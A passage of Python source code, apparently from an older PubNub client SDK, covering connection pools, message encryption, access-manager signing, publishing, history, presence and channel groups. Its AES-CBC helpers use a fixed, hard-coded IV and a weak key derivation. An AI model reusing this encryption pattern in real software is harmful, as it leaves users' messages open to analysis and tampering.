'http' : PubnubHTTPConnectionPool, 'https' : PubnubHTTPSConnectionPool } """ ################################## ##### Tornado imports and globals ##### try: import tornado.httpclient import tornado.ioloop from tornado.stack_context import ExceptionStackContext ioloop = tornado.ioloop.IOLoop.instance() 
except ImportError: pass ####################################### ##### Twisted imports and globals ##### try: from twisted.internet import reactor from twisted.internet.defer import Deferred from twisted.internet.protocol import Protocol from twisted.web.client import Agent, ContentDecoderAgent from twisted.web.client import RedirectAgent, GzipDecoder from twisted.web.client import HTTPConnectionPool from twisted.web.http_headers import Headers from twisted.internet.ssl import ClientContextFactory import twisted pnconn_pool = HTTPConnectionPool(reactor, persistent=True) pnconn_pool.maxPersistentPerHost = 100000 pnconn_pool.cachedConnectionTimeout = 15 pnconn_pool.retryAutomatically = True class WebClientContextFactory(ClientContextFactory): def getContext(self, hostname, port): return ClientContextFactory.getContext(self) class PubNubPamResponse(Protocol): def __init__(self, finished): self.finished = finished def dataReceived(self, bytes): self.finished.callback(bytes) class PubNubResponse(Protocol): def __init__(self, finished): self.finished = finished def dataReceived(self, bytes): self.finished.callback(bytes) except ImportError: pass ####################################### def get_data_for_user(data): try: if 'message' in data and 'payload' in data: return {'message': data['message'], 'payload': data['payload']} else: return data except TypeError: return data class PubnubCrypto2(): def pad(self, msg, block_size=16): padding = block_size - (len(msg) % block_size) return msg + chr(padding) * padding def depad(self, msg): return msg[0:-ord(msg[-1])] def getSecret(self, key): return hashlib.sha256(key).hexdigest() def encrypt(self, key, msg): secret = self.getSecret(key) Initial16bytes = '0123456789012345' cipher = AES.new(secret[0:32], AES.MODE_CBC, Initial16bytes) enc = encodestring(cipher.encrypt(self.pad(msg))) return enc def decrypt(self, key, msg): try: secret = self.getSecret(key) Initial16bytes = '0123456789012345' cipher = AES.new(secret[0:32], AES.MODE_CBC, Initial16bytes) plain = self.depad(cipher.decrypt(decodestring(msg))) except: return msg try: return json.loads(plain) except SyntaxError: return plain class PubnubCrypto3(): def pad(self, msg, block_size=16): padding = block_size - (len(msg) % block_size) return msg + (chr(padding) * padding).encode('utf-8') def depad(self, msg): return msg[0:-ord(msg[-1])] def getSecret(self, key): return hashlib.sha256(key.encode("utf-8")).hexdigest() def encrypt(self, key, msg): secret = self.getSecret(key) Initial16bytes = '0123456789012345' cipher = AES.new(secret[0:32], AES.MODE_CBC, Initial16bytes) return encodestring( cipher.encrypt(self.pad(msg.encode('utf-8')))).decode('utf-8') def decrypt(self, key, msg): secret = self.getSecret(key) Initial16bytes = '0123456789012345' cipher = AES.new(secret[0:32], AES.MODE_CBC, Initial16bytes) return (cipher.decrypt( decodestring(msg.encode('utf-8')))).decode('utf-8') class PubnubBase(object): def __init__( self, publish_key, subscribe_key, secret_key=False, cipher_key=False, auth_key=None, ssl_on=False, origin='pubsub.pubnub.com', uuid=None ): """Pubnub Class Provides methods to communicate with Pubnub cloud Attributes: publish_key: Publish Key subscribe_key: Subscribe Key secret_key: Secret Key cipher_key: Cipher Key auth_key: Auth Key (used with Pubnub Access Manager i.e. PAM) ssl: SSL enabled ? 
origin: Origin """ self.origin = origin self.version = '3.7.3' self.limit = 1800 self.publish_key = publish_key self.subscribe_key = subscribe_key self.secret_key = secret_key self.cipher_key = cipher_key self.ssl = ssl_on self.auth_key = auth_key self.STATE = {} if self.ssl: self.origin = 'https://' + self.origin else: self.origin = 'http://' + self.origin self.uuid = uuid or str(uuid_lib.uuid4()) if type(sys.version_info) is tuple: self.python_version = 2 self.pc = PubnubCrypto2() else: if sys.version_info.major == 2: self.python_version = 2 self.pc = PubnubCrypto2() else: self.python_version = 3 self.pc = PubnubCrypto3() if not isinstance(self.uuid, str): raise AttributeError("uuid must be a string") def _pam_sign(self, msg): sign = urlsafe_b64encode(hmac.new( self.secret_key.encode("utf-8"), msg.encode("utf-8"), sha256 ).digest()) return quote(sign, safe="") def set_u(self, u=False): self.u = u def _pam_auth(self, query, apicode=0, callback=None, error=None): if 'timestamp' not in query: query['timestamp'] = int(time.time()) ## Global Grant? if 'auth' in query and not query['auth']: del query['auth'] if 'channel' in query and not query['channel']: del query['channel'] if 'channel-group' in query and not query['channel-group']: del query['channel-group'] params = "&".join([ x + "=" + quote( str(query[x]), safe="" ) for x in sorted(query) ]) sign_input = "{subkey}\n{pubkey}\n{apitype}\n{params}".format( subkey=self.subscribe_key, pubkey=self.publish_key, apitype="audit" if (apicode) else "grant", params=params ) query['signature'] = self._pam_sign(sign_input) return self._request({"urlcomponents": [ 'v1', 'auth', "audit" if (apicode) else "grant", 'sub-key', self.subscribe_key ], 'urlparams': query}, self._return_wrapped_callback(callback), self._return_wrapped_callback(error)) def get_origin(self): return self.origin def set_auth_key(self, auth_key): self.auth_key = auth_key def get_auth_key(self): return self.auth_key def grant(self, channel=None, channel_group=None, auth_key=False, read=False, write=False, manage=False, ttl=5, callback=None, error=None): """Method for granting permissions. This function establishes subscribe and/or write permissions for PubNub Access Manager (PAM) by setting the read or write attribute to true. A grant with read or write set to false (or not included) will revoke any previous grants with read or write set to true. Permissions can be applied to any one of three levels: 1. Application level privileges are based on subscribe_key applying to all associated channels. 2. Channel level privileges are based on a combination of subscribe_key and channel name. 3. User level privileges are based on the combination of subscribe_key, channel and auth_key. Args: channel: (string) (optional) Specifies channel name to grant permissions to. If channel/channel_group is not specified, the grant applies to all channels associated with the subscribe_key. If auth_key is not specified, it is possible to grant permissions to multiple channels simultaneously by specifying the channels as a comma separated list. channel_group: (string) (optional) Specifies channel group name to grant permissions to. If channel/channel_group is not specified, the grant applies to all channels associated with the subscribe_key. If auth_key is not specified, it is possible to grant permissions to multiple channel groups simultaneously by specifying the channel groups as a comma separated list. auth_key: (string) (optional) Specifies auth_key to grant permissions to. 
It is possible to specify multiple auth_keys as comma separated list in combination with a single channel name. If auth_key is provided as the special-case value "null" (or included in a comma-separated list, eg. "null,null,abc"), a new auth_key will be generated and returned for each "null" value. read: (boolean) (default: True) Read permissions are granted by setting to True. Read permissions are removed by setting to False. write: (boolean) (default: True) Write permissions are granted by setting to true. Write permissions are removed by setting to false. manage: (boolean) (default: True) Manage permissions are granted by setting to true. Manage permissions are removed by setting to false. ttl: (int) (default: 1440 i.e 24 hrs) Time in minutes for which granted permissions are valid. Max is 525600 , Min is 1. Setting ttl to 0 will apply the grant indefinitely. callback: (function) (optional) A callback method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado error: (function) (optional) An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . Returns: Returns a dict in sync mode i.e. when callback argument is not given The dict returned contains values with keys 'message' and 'payload' Sample Response: { "message":"Success", "payload":{ "ttl":5, "auths":{ "my_ro_authkey":{"r":1,"w":0} }, "subscribe_key":"my_subkey", "level":"user", "channel":"my_channel" } } """ return self._pam_auth({ 'channel' : channel, 'channel-group' : channel_group, 'auth' : auth_key, 'r' : read and 1 or 0, 'w' : write and 1 or 0, 'm' : manage and 1 or 0, 'ttl' : ttl, 'pnsdk' : self.pnsdk }, callback=callback, error=error) def revoke(self, channel=None, channel_group=None, auth_key=None, ttl=1, callback=None, error=None): """Method for revoking permissions. Args: channel: (string) (optional) Specifies channel name to revoke permissions to. If channel/channel_group is not specified, the revoke applies to all channels associated with the subscribe_key. If auth_key is not specified, it is possible to grant permissions to multiple channels simultaneously by specifying the channels as a comma separated list. channel_group: (string) (optional) Specifies channel group name to revoke permissions to. If channel/channel_group is not specified, the grant applies to all channels associated with the subscribe_key. If auth_key is not specified, it is possible to revoke permissions to multiple channel groups simultaneously by specifying the channel groups as a comma separated list. auth_key: (string) (optional) Specifies auth_key to revoke permissions to. It is possible to specify multiple auth_keys as comma separated list in combination with a single channel name. If auth_key is provided as the special-case value "null" (or included in a comma-separated list, eg. "null,null,abc"), a new auth_key will be generated and returned for each "null" value. ttl: (int) (default: 1440 i.e 24 hrs) Time in minutes for which granted permissions are valid. Max is 525600 , Min is 1. Setting ttl to 0 will apply the grant indefinitely. callback: (function) (optional) A callback method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado error: (function) (optional) An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . 
Returns: Returns a dict in sync mode i.e. when callback argument is not given The dict returned contains values with keys 'message' and 'payload' Sample Response: { "message":"Success", "payload":{ "ttl":5, "auths":{ "my_authkey":{"r":0,"w":0} }, "subscribe_key":"my_subkey", "level":"user", "channel":"my_channel" } } """ return self._pam_auth({ 'channel' : channel, 'channel-group' : channel_group, 'auth' : auth_key, 'r' : 0, 'w' : 0, 'ttl' : ttl, 'pnsdk' : self.pnsdk }, callback=callback, error=error) def audit(self, channel=None, channel_group=None, auth_key=None, callback=None, error=None): """Method for fetching permissions from pubnub servers. This method provides a mechanism to reveal existing PubNub Access Manager attributes for any combination of subscribe_key, channel and auth_key. Args: channel: (string) (optional) Specifies channel name to return PAM attributes optionally in combination with auth_key. If channel/channel_group is not specified, results for all channels associated with subscribe_key are returned. If auth_key is not specified, it is possible to return results for a comma separated list of channels. channel_group: (string) (optional) Specifies channel group name to return PAM attributes optionally in combination with auth_key. If channel/channel_group is not specified, results for all channels associated with subscribe_key are returned. If auth_key is not specified, it is possible to return results for a comma separated list of channels. auth_key: (string) (optional) Specifies the auth_key to return PAM attributes for. If only a single channel is specified, it is possible to return results for a comma separated list of auth_keys. callback: (function) (optional) A callback method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado error: (function) (optional) An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . Returns: Returns a dict in sync mode i.e. when callback argument is not given The dict returned contains values with keys 'message' and 'payload' Sample Response { "message":"Success", "payload":{ "channels":{ "my_channel":{ "auths":{"my_ro_authkey":{"r":1,"w":0}, "my_rw_authkey":{"r":0,"w":1}, "my_admin_authkey":{"r":1,"w":1} } } }, } Usage: pubnub.audit ('my_channel'); # Sync Mode """ return self._pam_auth({ 'channel' : channel, 'channel-group' : channel_group, 'auth' : auth_key, 'pnsdk' : self.pnsdk }, 1, callback=callback, error=error) def encrypt(self, message): """Method for encrypting data. This method takes plaintext as input and returns encrypted data. This need not be called directly as enncryption/decryption is taken care of transparently by Pubnub class if cipher key is provided at time of initializing pubnub object Args: message: Message to be encrypted. Returns: Returns encrypted message if cipher key is set """ if self.cipher_key: message = json.dumps(self.pc.encrypt( self.cipher_key, json.dumps(message)).replace('\n', '')) else: message = json.dumps(message) return message def decrypt(self, message): """Method for decrypting data. This method takes ciphertext as input and returns decrypted data. This need not be called directly as enncryption/decryption is taken care of transparently by Pubnub class if cipher key is provided at time of initializing pubnub object Args: message: Message to be decrypted. 
Returns: Returns decrypted message if cipher key is set """ if self.cipher_key: message = self.pc.decrypt(self.cipher_key, message) return message def _return_wrapped_callback(self, callback=None): def _new_format_callback(response): if 'payload' in response: if (callback is not None): callback_data = dict() callback_data['payload'] = response['payload'] if 'message' in response: callback_data['message'] = response['message'] if (callback is not None): callback(callback_data) else: if (callback is not None): callback(response) if (callback is not None): return _new_format_callback else: return None def leave_channel(self, channel, callback=None, error=None): ## Send leave return self._request({"urlcomponents": [ 'v2', 'presence', 'sub_key', self.subscribe_key, 'channel', channel, 'leave' ], 'urlparams': {'auth': self.auth_key, 'pnsdk' : self.pnsdk, "uuid": self.uuid,}}, callback=self._return_wrapped_callback(callback), error=self._return_wrapped_callback(error)) def leave_group(self, channel_group, callback=None, error=None): ## Send leave return self._request({"urlcomponents": [ 'v2', 'presence', 'sub_key', self.subscribe_key, 'channel', ',', 'leave' ], 'urlparams': {'auth': self.auth_key, 'pnsdk' : self.pnsdk, 'channel-group' : channel_group, "uuid": self.uuid,}}, callback=self._return_wrapped_callback(callback), error=self._return_wrapped_callback(error)) def publish(self, channel, message, callback=None, error=None): """Publishes data on a channel. The publish() method is used to send a message to all subscribers of a channel. To publish a message you must first specify a valid publish_key at initialization. A successfully published message is replicated across the PubNub Real-Time Network and sent simultaneously to all subscribed clients on a channel. Messages in transit can be secured from potential eavesdroppers with SSL/TLS by setting ssl to True during initialization. Published messages can also be encrypted with AES-256 simply by specifying a cipher_key during initialization. Args: channel: (string) Specifies channel name to publish messages to. message: (string/int/double/dict/list) Message to be published callback: (optional) A callback method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado error: (optional) An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado Returns: Sync Mode : list Async Mode : None The function returns the following formatted response: [ Number, "Status", "Time Token"] The output below demonstrates the response to a successful call: [1,"Sent","13769558699541401"] """ message = self.encrypt(message) ## Send Message return self._request({"urlcomponents": [ 'publish', self.publish_key, self.subscribe_key, '0', channel, '0', message ], 'urlparams': {'auth': self.auth_key, 'pnsdk' : self.pnsdk}}, callback=self._return_wrapped_callback(callback), error=self._return_wrapped_callback(error)) def presence(self, channel, callback, error=None, connect=None, disconnect=None, reconnect=None): """Subscribe to presence events on a channel. Only works in async mode Args: channel: Channel name ( string ) on which to listen for events callback: A callback method should be passed as parameter. If passed, the api works in async mode. Required argument when working with twisted or tornado . error: Optional variable. An error method can be passed as parameter. If set, the api works in async mode. 
Returns: None """ return self.subscribe(channel+'-pnpres', callback=callback, error=error, connect=connect, disconnect=disconnect, reconnect=reconnect) def presence_group(self, channel_group, callback, error=None, connect=None, disconnect=None, reconnect=None): """Subscribe to presence events on a channel group. Only works in async mode Args: channel_group: Channel group name ( string ) callback: A callback method should be passed to the method. If passed, the api works in async mode. Required argument when working with twisted or tornado . error: Optional variable. An error method can be passed as parameter. If passed, the api works in async mode. Returns: None """ return self.subscribe_group(channel_group+'-pnpres', callback=callback, error=error, connect=connect, disconnect=disconnect, reconnect=reconnect) def here_now(self, channel, uuids=True, state=False, callback=None, error=None): """Get here now data. You can obtain information about the current state of a channel including a list of unique user-ids currently subscribed to the channel and the total occupancy count of the channel by calling the here_now() function in your application. Args: channel: (string) (optional) Specifies the channel name to return occupancy results. If channel is not provided, here_now will return data for all channels. callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . error: (optional) Optional variable. An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . Returns: Sync Mode: list Async Mode: None Response Format: The here_now() method returns a list of uuid s currently subscribed to the channel. uuids:["String","String", ... ,"String"] - List of UUIDs currently subscribed to the channel. occupancy: Number - Total current occupancy of the channel. Example Response: { occupancy: 4, uuids: [ '123123234t234f34fq3dq', '143r34f34t34fq34q34q3', '23f34d3f4rq34r34rq23q', 'w34tcw45t45tcw435tww3', ] } """ urlcomponents = [ 'v2', 'presence', 'sub_key', self.subscribe_key ] if (channel is not None and len(channel) > 0): urlcomponents.append('channel') urlcomponents.append(channel) data = {'auth': self.auth_key, 'pnsdk' : self.pnsdk} if state is True: data['state'] = '1' if uuids is False: data['disable_uuids'] = '1' ## Get Presence Here Now return self._request({"urlcomponents": urlcomponents, 'urlparams': data}, callback=self._return_wrapped_callback(callback), error=self._return_wrapped_callback(error)) def history(self, channel, count=100, reverse=False, start=None, end=None, include_token=False, callback=None, error=None): """This method fetches historical messages of a channel. PubNub Storage/Playback Service provides real-time access to an unlimited history for all messages published to PubNub. Stored messages are replicated across multiple availability zones in several geographical data center locations. Stored messages can be encrypted with AES-256 message encryption ensuring that they are not readable while stored on PubNub's network. It is possible to control how messages are returned and in what order, for example you can: Return messages in the order newest to oldest (default behavior). Return messages in the order oldest to newest by setting reverse to true. Page through results by providing a start or end time token. Retrieve a "slice" of the time line by providing both a start and end time token. 
Limit the number of messages to a specific quantity using the count parameter. Args: channel: (string) Specifies channel to return history messages from count: (int) (default: 100) Specifies the number of historical messages to return callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . error: (optional) An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . Returns: Returns a list in sync mode i.e. when callback argument is not given Sample Response: [["Pub1","Pub2","Pub3","Pub4","Pub5"],13406746729185766,13406746845892666] """ def _get_decrypted_history(resp): try: if resp is not None and isinstance(resp, (list)) and resp[1] is not None and self.cipher_key: msgs = resp[0] for i in range(0,len(msgs)): msgs[i] = self.decrypt(msgs[i]) except KeyError: pass return resp def _history_callback(resp): if callback is not None: callback(_get_decrypted_history(resp)) if callback is None: history_cb = None else: history_cb = _history_callback params = dict() params['count'] = count params['reverse'] = reverse params['start'] = start params['end'] = end params['auth'] = self.auth_key params['pnsdk'] = self.pnsdk params['include_token'] = 'true' if include_token else 'false' ## Get History return _get_decrypted_history(self._request({'urlcomponents': [ 'v2', 'history', 'sub-key', self.subscribe_key, 'channel', channel, ], 'urlparams': params}, callback=self._return_wrapped_callback(history_cb), error=self._return_wrapped_callback(error))) def time(self, callback=None): """This function will return a 17 digit precision Unix epoch. Args: callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . Returns: Returns a 17 digit number in sync mode i.e. when callback argument is not given Sample: 13769501243685161 """ time = self._request({'urlcomponents': [ 'time', '0' ]}, callback) if time is not None: return time[0] def _encode(self, request): return [ "".join([' ~`!@#$%^&*()+=[]\\{}|;\':",./<>?'.find(ch) > -1 and hex(ord(ch)).replace('0x', '%').upper() or ch for ch in list(bit) ]) for bit in request] def getUrl(self, request): if self.u is True and "urlparams" in request: request['urlparams']['u'] = str(random.randint(1, 100000000000)) ## Build URL url = self.origin + '/' + "/".join([ "".join([' ~`!@#$%^&*()+=[]\\{}|;\':",./<>?'.find(ch) > -1 and hex(ord(ch)).replace('0x', '%').upper() or ch for ch in list(bit) ]) for bit in request["urlcomponents"]]) if ("urlparams" in request): url = url + '?' 
+ "&".join([x + "=" + str(y) for x, y in request[ "urlparams"].items() if y is not None and len(str(y)) > 0]) #print(url) return url def _channel_registry(self, url=None, params=None, callback=None, error=None): if (params is None): params = dict() urlcomponents = ['v1', 'channel-registration', 'sub-key', self.subscribe_key ] if (url is not None): urlcomponents += url params['auth'] = self.auth_key params['pnsdk'] = self.pnsdk ## Get History return self._request({'urlcomponents': urlcomponents, 'urlparams': params}, callback=self._return_wrapped_callback(callback), error=self._return_wrapped_callback(error)) def _channel_group(self, channel_group=None, channels=None, cloak=None,mode='add', callback=None, error=None): params = dict() url = [] namespace = None if (channel_group is not None and len(channel_group) > 0): ns_ch_a = channel_group.split(':') if len(ns_ch_a) > 1: namespace = None if ns_ch_a[0] == '*' else ns_ch_a[0] channel_group = ns_ch_a[1] else: channel_group = ns_ch_a[0] if (namespace is not None): url.append('namespace') url.append(self._encode(namespace)) url.append('channel-group') if channel_group is not None and channel_group != '*': url.append(channel_group) if (channels is not None): if (type(channels) is list): channels = ','.join(channels) params[mode] = channels #params['cloak'] = 'true' if CLOAK is True else 'false' else: if mode == 'remove': url.append('remove') return self._channel_registry(url=url, params=params, callback=callback, error=error) def channel_group_list_namespaces(self, callback=None, error=None): """Get list of namespaces. You can obtain list of namespaces for the subscribe key associated with PubNub object using this method. Args: callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado. error: (optional) Optional variable. An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado. Returns: Sync Mode: dict channel_group_list_namespaces method returns a dict which contains list of namespaces in payload field { u'status': 200, u'payload': { u'sub_key': u'demo', u'namespaces': [u'dev', u'foo'] }, u'service': u'channel-registry', u'error': False } Async Mode: None (callback gets the response as parameter) Response Format: The callback passed to channel_group_list_namespaces gets the a dict containing list of namespaces under payload field { u'payload': { u'sub_key': u'demo', u'namespaces': [u'dev', u'foo'] } } namespaces is the list of namespaces for the given subscribe key """ url = ['namespace'] return self._channel_registry(url=url, callback=callback, error=error) def channel_group_remove_namespace(self, namespace, callback=None, error=None): """Remove a namespace. A namespace can be deleted using this method. Args: namespace: (string) namespace to be deleted callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . error: (optional) Optional variable. An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . 
Returns: Sync Mode: dict channel_group_remove_namespace method returns a dict indicating status of the request { u'status': 200, u'message': 'OK', u'service': u'channel-registry', u'error': False } Async Mode: None ( callback gets the response as parameter ) Response Format: The callback passed to channel_group_list_namespaces gets the a dict indicating status of the request { u'status': 200, u'message': 'OK', u'service': u'channel-registry', u'error': False } """ url = ['namespace', self._encode(namespace), 'remove'] return self._channel_registry(url=url, callback=callback, error=error) def channel_group_list_groups(self, namespace=None, callback=None, error=None): """Get list of groups. Using this method, list of groups for the subscribe key associated with PubNub object, can be obtained. If namespace is provided, groups within the namespace only are listed Args: namespace: (string) (optional) namespace callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . error: (optional) Optional variable. An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . Returns: Sync Mode: dict channel_group_list_groups method returns a dict which contains list of groups in payload field { u'status': 200, u'payload': {"namespace": "dev", "groups": ["abcd"]}, u'service': u'channel-registry', u'error': False } Async Mode: None ( callback gets the response as parameter ) Response Format: The callback passed to channel_group_list_namespaces gets the a dict containing list of groups under payload field { u'payload': {"namespace": "dev", "groups": ["abcd"]} } """ if (namespace is not None and len(namespace) > 0): channel_group = namespace + ':*' else: channel_group = '*:*' return self._channel_group(channel_group=channel_group, callback=callback, error=error) def channel_group_list_channels(self, channel_group, callback=None, error=None): """Get list of channels for a group. Using this method, list of channels for a group, can be obtained. Args: channel_group: (string) (optional) Channel Group name. It can also contain namespace. If namespace is also specified, then the parameter will be in format namespace:channel_group callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado. error: (optional) Optional variable. An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado. Returns: Sync Mode: dict channel_group_list_channels method returns a dict which contains list of channels in payload field { u'status': 200, u'payload': {"channels": ["hi"], "group": "abcd"}, u'service': u'channel-registry', u'error': False } Async Mode: None ( callback gets the response as parameter ) Response Format: The callback passed to channel_group_list_channels gets the a dict containing list of channels under payload field { u'payload': {"channels": ["hi"], "group": "abcd"} } """ return self._channel_group(channel_group=channel_group, callback=callback, error=error) def channel_group_add_channel(self, channel_group, channel, callback=None, error=None): """Add a channel to group. A channel can be added to group using this method. Args: channel_group: (string) Channel Group name. It can also contain namespace. 
If namespace is also specified, then the parameter will be in format namespace:channel_group channel: (string) Can be a channel name, a list of channel names, or a comma separated list of channel names callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado. error: (optional) Optional variable. An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado. Returns: Sync Mode: dict channel_group_add_channel method returns a dict indicating status of the request { u'status': 200, u'message': 'OK', u'service': u'channel-registry', u'error': False } Async Mode: None ( callback gets the response as parameter ) Response Format: The callback passed to channel_group_add_channel gets the a dict indicating status of the request { u'status': 200, u'message': 'OK', u'service': u'channel-registry', u'error': False } """ return self._channel_group(channel_group=channel_group, channels=channel, mode='add', callback=callback, error=error) def channel_group_remove_channel(self, channel_group, channel, callback=None, error=None): """Remove channel. A channel can be removed from a group method. Args: channel_group: (string) Channel Group name. It can also contain namespace. If namespace is also specified, then the parameter will be in format namespace:channel_group channel: (string) Can be a channel name, a list of channel names, or a comma separated list of channel names callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . error: (optional) Optional variable. An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . Returns: Sync Mode: dict channel_group_remove_channel method returns a dict indicating status of the request { u'status': 200, u'message': 'OK', u'service': u'channel-registry', u'error': False } Async Mode: None ( callback gets the response as parameter ) Response Format: The callback passed to channel_group_remove_channel gets the a dict indicating status of the request { u'status': 200, u'message': 'OK', u'service': u'channel-registry', u'error': False } """ return self._channel_group(channel_group=channel_group, channels=channel, mode='remove', callback=callback, error=error) def channel_group_remove_group(self, channel_group, callback=None, error=None): """Remove channel group. A channel group can be removed using this method. Args: channel_group: (string) Channel Group name. It can also contain namespace. If namespace is also specified, then the parameter will be in format namespace:channel_group callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado. error: (optional) Optional variable. An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado. 
Returns: Sync Mode: dict channel_group_remove_group method returns a dict indicating status of the request { u'status': 200, u'message': 'OK', u'service': u'channel-registry', u'error': False } Async Mode: None ( callback gets the response as parameter ) Response Format: The callback passed to channel_group_remove_group gets the a dict indicating status of the request { u'status': 200, u'message': 'OK', u'service': u'channel-registry', u'error': False } """ return self._channel_group(channel_group=channel_group, mode='remove', callback=callback, error=error) class EmptyLock(): def __enter__(self): pass def __exit__(self, a, b, c): pass empty_lock = EmptyLock() class PubnubCoreAsync(PubnubBase): def start(self): pass def stop(self): pass def __init__( self, publish_key, subscribe_key, secret_key=None, cipher_key=None, auth_key=None, ssl_on=False, origin='pubsub.pubnub.com', uuid=None, _tt_lock=empty_lock, _channel_list_lock=empty_lock, _channel_group_list_lock=empty_lock ): super(PubnubCoreAsync, self).__init__( publish_key=publish_key, subscribe_key=subscribe_key, secret_key=secret_key, cipher_key=cipher_key, auth_key=auth_key, ssl_on=ssl_on, origin=origin, uuid=uuid ) self.subscriptions = {} self.subscription_groups = {} self.timetoken = 0 self.last_timetoken = 0 self.accept_encoding = 'gzip' self.SUB_RECEIVER = None self._connect = None self._tt_lock = _tt_lock self._channel_list_lock = _channel_list_lock self._channel_group_list_lock = _channel_group_list_lock self._connect = lambda: None self.u = None def get_channel_list(self, channels): channel = '' first = True with self._channel_list_lock: for ch in channels: if not channels[ch]['subscribed']: continue if not first: channel += ',' else: first = False channel += ch return channel def get_channel_group_list(self, channel_groups): channel_group = '' first = True with self._channel_group_list_lock: for ch in channel_groups: if not channel_groups[ch]['subscribed']: continue if not first: channel_group += ',' else: first = False channel_group += ch return channel_group def get_channel_array(self): """Get List of currently subscribed channels Returns: Returns a list containing names of channels subscribed Sample return value: ["a","b","c] """ channels = self.subscriptions channel = [] with self._channel_list_lock: for ch in channels: if not channels[ch]['subscribed']: continue channel.append(ch) return channel def get_channel_group_array(self): """Get List of currently subscribed channel groups Returns: Returns a list containing names of channel groups subscribed Sample return value: ["a","b","c] """ channel_groups = self.subscription_groups channel_group = [] with self._channel_group_list_lock: for ch in channel_groups: if not channel_groups[ch]['subscribed']: continue channel_group.append(ch) return channel_group def each(l, func): if func is None: return for i in l: func(i) def subscribe(self, channels, callback, state=None, error=None, connect=None, disconnect=None, reconnect=None, presence=None, sync=False): """Subscribe to data on a channel. This function causes the client to create an open TCP socket to the PubNub Real-Time Network and begin listening for messages on a specified channel. To subscribe to a channel the client must send the appropriate subscribe_key at initialization. Only works in async mode Args: channel: (string/list) Specifies the channel to subscribe to. It is possible to specify multiple channels as a comma separated list or andarray. 
callback: (function) This callback is called on receiving a message from the channel. state: (dict) State to be set. error: (function) (optional) This callback is called on an error event connect: (function) (optional) This callback is called on a successful connection to the PubNub cloud disconnect: (function) (optional) This callback is called on client disconnect from the PubNub cloud reconnect: (function) (optional) This callback is called on successfully re-connecting to the PubNub cloud Returns: None """ return self._subscribe(channels=channels, callback=callback, state=state, error=error, connect=connect, disconnect=disconnect, reconnect=reconnect, presence=presence) def subscribe_group(self, channel_groups, callback, error=None, connect=None, disconnect=None, reconnect=None, sync=False): """Subscribe to data on a channel group. This function causes the client to create an open TCP socket to the PubNub Real-Time Network and begin listening for messages on a specified channel. To subscribe to a channel group the client must send the appropriate subscribe_key at initialization. Only works in async mode Args: channel_groups: (string/list) Specifies the channel groups to subscribe to. It is possible to specify multiple channel groups as a comma separated list or andarray. callback: (function) This callback is called on receiving a message from the channel. error: (function) (optional) This callback is called on an error event connect: (function) (optional) This callback is called on a successful connection to the PubNub cloud disconnect: (function) (optional) This callback is called on client disconnect from the PubNub cloud reconnect: (function) (optional) This callback is called on successfully re-connecting to the PubNub cloud Returns: None """ return self._subscribe(channel_groups=channel_groups, callback=callback, error=error, connect=connect, disconnect=disconnect, reconnect=reconnect) def _subscribe(self, channels=None, channel_groups=None, state=None, callback=None, error=None, connect=None, disconnect=None, reconnect=None, presence=None): with self._tt_lock: self.last_timetoken = self.timetoken if self.timetoken != 0 \ else self.last_timetoken self.timetoken = 0 def _invoke(func, msg=None, channel=None, real_channel=None): if func is not None: if msg is not None and channel is not None and real_channel is not None: try: func(get_data_for_user(msg), channel, real_channel) except: func(get_data_for_user(msg), channel) elif msg is not None and channel is not None: func(get_data_for_user(msg), channel) elif msg is not None: func(get_data_for_user(msg)) else: func() def _invoke_connect(): if self._channel_list_lock: with self._channel_list_lock: x = copy.copy(self.subscriptions) for ch in x: chobj = x[ch] if chobj['connected'] is False: chobj['connected'] = True chobj['disconnected'] = False _invoke(chobj['connect'], chobj['name']) else: if chobj['disconnected'] is True: chobj['disconnected'] = False _invoke(chobj['reconnect'], chobj['name']) if self._channel_group_list_lock: with self._channel_group_list_lock: for ch in self.subscription_groups: chobj = self.subscription_groups[ch] if chobj['connected'] is False: chobj['connected'] = True chobj['disconnected'] = False _invoke(chobj['connect'], chobj['name']) else: if chobj['disconnected'] is True: chobj['disconnected'] = False _invoke(chobj['reconnect'], chobj['name']) def _invoke_disconnect(): if self._channel_list_lock: with self._channel_list_lock: for ch in self.subscriptions: chobj = self.subscriptions[ch] if 
